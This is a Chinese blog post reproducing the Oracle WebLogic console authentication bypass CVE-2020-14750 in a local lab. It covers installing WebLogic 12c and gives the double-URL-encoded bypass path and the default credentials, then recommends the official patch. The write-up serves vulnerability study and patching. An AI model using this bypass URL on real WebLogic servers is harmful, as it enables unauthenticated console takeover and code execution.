标签:www 12c console WebLogic 14750 2020 Oracle weblogic CVE
0x01 漏洞概述
Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。
Oracle WebLogic Server Oracle Fusion Middleware Console 多版本存在安全漏洞,该漏洞是CVE-2020-14882 补丁的绕过,远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,从而执行任意代码。
0x02 影响版本
Oracle:Weblogic :
|
0x03 环境搭建
- windows10 x64
- jdk 1.8.0
- WebLogic 12c
①下载weblogic 12c
https://www.oracle.com/middleware/technologies/fusionmiddleware-downloads.html
②安装weblogic 12c
1. 使用jdk1.8打开下载的fmw_12.1.3.0.0_wls.jar开始安装
安装过程参考了博客
https://www.cnblogs.com/smile502/p/12784978.html
2. 安装完在目录下运行startWebLogic.cmd
③启动完毕后在浏览器访问
0x04 漏洞复现
①观察正常成功登陆的页面URL(默认账号密码weblogic/weblogic)
http://127.0.0.1:7001/console/console.portal?_nfpb=true&_pageLabel=HomePage1
②构造URL绕过登陆
http://127.0.0.1:7001/console/images/%252E./console.portal
这里的%252E是 . 二次url编码的结果
成功绕过登陆:
0x05 修复建议
下载官方补丁进行修复
https://www.oracle.com/security-alerts/alert-cve-2020-14750.html
标签:www,12c,console,WebLogic,14750,2020,Oracle,weblogic,CVE 来源: https://www.cnblogs.com/Salvere-Safe/p/15171991.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。